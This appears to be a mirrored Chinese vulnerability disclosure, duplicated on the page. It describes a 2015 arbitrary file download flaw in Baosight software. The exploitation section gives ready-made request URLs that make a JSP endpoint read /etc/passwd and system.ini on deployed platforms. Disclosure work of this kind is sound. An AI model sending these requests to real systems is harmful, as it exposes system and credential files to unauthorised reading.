VULHUB ™

### 0x01 漏洞框架 相关厂商：上海宝信软件股份有限公司 提交时间：2015-04-26 公开时间：2015-07-27 漏洞类型：任意文件遍历/下载 上海宝信软件股份有限公司（简称“宝信软件”）系宝钢股份控股的软件企业，2001年4月上市，公司总部位于上海浦东张江高科技园区。 宝信软件秉承“IT服务，提升信息价值”的经营理念，凭借30多年的经验和技术积累，全面提供具有自主知识产权的企业信息化解决方案、自动化系统集成及运行维护服务。产品与服务业绩遍及钢铁、交通、服务外包、采掘、有色、石化、装备制造（含造船）、金融、公共服务、资源、医药等多个行业。宝信软件累计已申请专利、软件著作权、技术秘密认定数百项，承担着国家发改委高新技术产业化示范项目、国家科技部863项目、国家工信部电子基金项目等诸多重大技术和产品项目。 官方主页：http://www.baosight.com/baosight_portal/index.jsp  ### 0x02 漏洞利用 以工信部通信工程建设项目招标投标管理信息平台为例 https://**.**.**.**/EC/DM/ECDM0104.jsp?filePath=/etc/passwd&originalFilename=passwd   利用方式： http://**.**.**.**/ieps/EC/DM/ECDM0104.jsp?filePath=/etc/passwd&originalFilename=passwd http://**.**.**.**/gxportal/EC/DM/ECDM0104.jsp?filePath=C:\Windows\system.ini&originalFilename=system.ini ### 0x03 参考链接...

### 0x01 漏洞框架 相关厂商：上海宝信软件股份有限公司 提交时间：2015-04-26 公开时间：2015-07-27 漏洞类型：任意文件遍历/下载 上海宝信软件股份有限公司（简称“宝信软件”）系宝钢股份控股的软件企业，2001年4月上市，公司总部位于上海浦东张江高科技园区。 宝信软件秉承“IT服务，提升信息价值”的经营理念，凭借30多年的经验和技术积累，全面提供具有自主知识产权的企业信息化解决方案、自动化系统集成及运行维护服务。产品与服务业绩遍及钢铁、交通、服务外包、采掘、有色、石化、装备制造（含造船）、金融、公共服务、资源、医药等多个行业。宝信软件累计已申请专利、软件著作权、技术秘密认定数百项，承担着国家发改委高新技术产业化示范项目、国家科技部863项目、国家工信部电子基金项目等诸多重大技术和产品项目。 官方主页：http://www.baosight.com/baosight_portal/index.jsp  ### 0x02 漏洞利用 以工信部通信工程建设项目招标投标管理信息平台为例 https://**.**.**.**/EC/DM/ECDM0104.jsp?filePath=/etc/passwd&originalFilename=passwd   利用方式： http://**.**.**.**/ieps/EC/DM/ECDM0104.jsp?filePath=/etc/passwd&originalFilename=passwd http://**.**.**.**/gxportal/EC/DM/ECDM0104.jsp?filePath=C:\Windows\system.ini&originalFilename=system.ini ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2015-0109842